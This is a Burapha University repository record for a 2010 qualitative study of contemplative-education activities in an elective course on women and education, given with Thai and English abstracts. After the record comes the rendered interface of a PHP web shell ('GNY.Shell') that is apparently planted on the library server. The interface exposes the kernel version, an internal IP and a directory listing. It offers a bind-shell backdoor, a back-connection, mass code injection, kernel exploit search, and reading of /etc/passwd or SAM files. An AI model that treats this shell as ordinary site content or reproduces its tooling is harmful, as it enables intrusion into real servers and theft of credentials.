ผลการจัดกิจกรรมจิตตปัญญาศึกษา: กรณีศึกษารายวิชาเลือก สตรีกับการศึกษา

Titleผลการจัดกิจกรรมจิตตปัญญาศึกษา: กรณีศึกษารายวิชาเลือก สตรีกับการศึกษา
Publication TypeResearch
Year of Publication2553
Authorsจันทร์ชลี มาพุทธ., Chanchalee Mapudh.
Institutionมหาวิทยาลัยบูรพา. คณะศึกษาศาสตร์.
Cityชลบุรี.
Typeงานวิจัย.
Keywordsกิจกรรมทางการศึกษา., จิตตปัญญาศึกษา., สาขาการศึกษา.
Abstractการวิจัยครั้งนี้มีวัตถุประสงค์เพื่อศึกษาผลการจัดกิจกรรมจิตตปัญญาศึกษาโยจัดกิจกรรม จิตตปัญญาศึกษาในรายวิชาเลือก สตรีกับการศึกษาจากนิสิต จำนวน 18 คน โดยผู้วิจัยศึกษาแนวคิดจิตปัญญาศึกษา กิจกรรมและผลการจัดกิจกรรม ด้วยวิธีวิจัยเชิงคุณภาพ (Qualitative Research) ใช้วิธีการสังเกตอย่างมีส่วนร่วม การจดบันทึกและการสะท้อนความคิด เครื่องมือที่ใช้ในการวิจัยประกอบด้วย ผู้วิจัย สมุดบันทึก กิจกรรมที่ใช้ ได้แก่ กิจกรรมสุนทรียสนทนา (Dialogue) การฟังอย่างลึกซึ้ง (Deep Listening) การเล่าเรื่อง (Story Telling) การบันทึก การเรียนรู้ (Journaling) การผ่อนพักตระหนักรู้ (Mindful Relaxation) การวาดภาพ (Drawing) การเลือกภาพ (Select pictures) การมีสติกับการทำงาน (Mindfulness Practice) และ งานจิตอาสา (Volunteer Spirit) การวิเคราะห์ข้อมูล โดยวิเคราะห์เนื้อหา (Content Analysis) ผลการวิจัยพบว่า ผู้เรียนเกิดการเรียนรั้อย่างลึกซึ้ง ช่วยพัฒนาการคิดเชิงวิพากษ์ การวิเคราะห์ และความสามารถในการแก้ปัญหา ทั้งยังส่งผลต่อการพัฒนาด้านอารมณ์ การยอมรับตนเองและสังคม นอกจากนั้นยังทำให้ผู้เรียนสามารถซาบซึ้งและเข้าใจ มีความสามารถในการเรียนรู้ร่วมกัน ทั้งยังส่งผลต่าการคิดเชิงสร้างสรรค์และเปลี่ยนแปลงความคิดของผู้เรียน Abstract This study examined the result of contemplative education a case study philosophy and concepts of education from 18 students in different years. The researcher contemplative concept, activities and result by qualitative research, participant observation journal and reflection. The instrument used composed researcher. Journaling, dialogue, deep listening, storytelling mindful relaxation, drawing, select pictures and volunteer spirit. Data anlysized by content analysis. This study finding indicate broadly that contemplative/spiritual teaching-learning approaches do indeed complement student - centered approaches and that these two approaches are likely to prove synergistic - i.e., when used together approaches foster student learning on a deeper level than might occur when either approach is used alone. The finding also indicate that spiritual/ contemplative approaches to education support enhance the development of a number of important traditional academic skills such as critical and objective thinking, textual analysis, and problem-solving, as well as important affective qualities such as emotional intelligence, commitment to social engagement, a sense of purpose, the ability to listen deeply, compassion, meta- cognition, the ability to cooperate, and welcoming diversity. Furthermore, spiritual/ contemplative approaches foster creativity and transformation thinking.
Research Notesงานวิจัยนี้ได้รับทุนสนับสนุนการวิจัยจากสำนักงานกองทุนสนับสนุนการส่งเสริมสุขภาพ (สสส.)
Alternate TitleThe result of contemplative education: a case study women and education
GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 265.48 GB of 389.83 GB (68.1%)Server IP: 10.32.1.15 - Your IP: 54.145.235.72

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.0228 ]:.